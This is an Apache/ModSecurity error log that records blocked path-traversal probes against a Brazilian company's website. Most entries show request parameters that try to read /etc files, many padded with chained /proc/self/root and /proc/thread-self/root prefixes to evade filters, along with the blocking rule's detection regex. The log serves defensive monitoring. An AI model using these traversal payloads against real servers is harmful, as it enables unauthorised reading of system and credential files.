[Fri Mar 20 05:33:25.391919 2026] [:error] [pid 15826:tid 140411733534464] [client 57.141.18.5:34616] [client 57.141.18.5] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/polkit-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GVeoXxyEfFpUF8f9k8AAAAUE"]
[Fri Mar 20 05:33:27.124021 2026] [:error] [pid 15826:tid 140411599251200] [client 57.141.18.36:34640] [client 57.141.18.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.cshrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GV-oXxyEfFpUF8f9k9gAAAVE"]
[Fri Mar 20 05:33:27.542198 2026] [:error] [pid 31215:tid 140411666392832] [client 57.141.18.93:34688] [client 57.141.18.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GVwF0L0L-SsrnPo5K-gAAAsk"]
[Fri Mar 20 05:33:27.824984 2026] [:error] [pid 11167:tid 140411674785536] [client 57.141.18.119:34696] [client 57.141.18.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.allow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GV_HIg5MgXLBnicPcmwAAAcg"]
[Fri Mar 20 05:33:28.191060 2026] [:error] [pid 31215:tid 140411641214720] [client 57.141.18.0:34710] [client 57.141.18.0] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GWAF0L0L-SsrnPo5K-wAAAsw"]
[Fri Mar 20 05:33:28.498580 2026] [:error] [pid 21219:tid 140411649607424] [client 57.141.18.106:34726] [client 57.141.18.106] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/machine-id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GWPXLqtnMIWvjpaJ9KgAAAos"]
[Fri Mar 20 05:34:00.935063 2026] [:error] [pid 11642:tid 140411691570944] [client 74.7.243.128:35078] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0GeLninkcc-iUj5ApCGQAAA4Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 05:34:02.844054 2026] [:error] [pid 7235:tid 140411632822016] [client 74.7.241.31:54856] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0GevqxLDW4GITHUkTGJwAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:34:06.691061 2026] [:error] [pid 9818:tid 140411708356352] [client 74.7.241.31:46958] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Gfl1pVZ5mVmJwsFMTPgAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:34:28.563617 2026] [mime_magic:error] [pid 7235:tid 140411599251200] (70014)End of file found: [client 216.73.216.191:38204] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:34:42.295575 2026] [:error] [pid 21219:tid 140411624429312] [client 74.7.241.31:50716] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/csh.cshrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0GovXLqtnMIWvjpaJ9kAAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 05:34:52.753616 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.241.31:47050] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0GrOoXxyEfFpUF8f9lSwAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 05:35:05.252370 2026] [:error] [pid 7893:tid 140411649607424] [client 74.7.243.128:53736] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0GuRCii7xarUs8iHZKjQAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 05:35:08.301796 2026] [mime_magic:error] [pid 21219:tid 140411741927168] (70014)End of file found: [client 57.141.18.73:40512] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:35:28.357225 2026] [:error] [pid 10189:tid 140411557287680] [client 74.7.243.128:47030] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0G0DJ3M9BSuKP7CAb2wAAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 05:35:29.467681 2026] [mime_magic:error] [pid 26799:tid 140411708356352] (70014)End of file found: [client 216.73.216.191:41728] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:35:30.879425 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:38526] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0G0ta6ubjKNq_cu4a0-AAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:35:31.563393 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.241.31:46710] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0G0-oXxyEfFpUF8f9lhgAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:35:38.044701 2026] [:error] [pid 7893:tid 140411691570944] [client 74.7.241.31:45534] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0G2hCii7xarUs8iHZKvgAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:35:39.851413 2026] [:error] [pid 11642:tid 140411590858496] [client 74.7.243.128:38530] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0G27ninkcc-iUj5ApCewAAA5I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:35:41.391360 2026] [:error] [pid 31215:tid 140411557287680] [client 74.7.243.128:55792] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0G3QF0L0L-SsrnPo5LcwAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 05:35:45.054479 2026] [:error] [pid 7893:tid 140411741927168] [client 74.7.243.128:55794] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0G4RCii7xarUs8iHZKwgAAAgA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 05:35:47.145428 2026] [:error] [pid 21219:tid 140411691570944] [client 74.7.241.31:45680] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0G4vXLqtnMIWvjpaJ91AAAAoY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:35:47.159328 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.243.128:55808] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0G4uoXxyEfFpUF8f9lnAAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:35:49.062437 2026] [:error] [pid 11642:tid 140411624429312] [client 74.7.243.128:55824] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0G5bninkcc-iUj5ApCgwAAA44"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
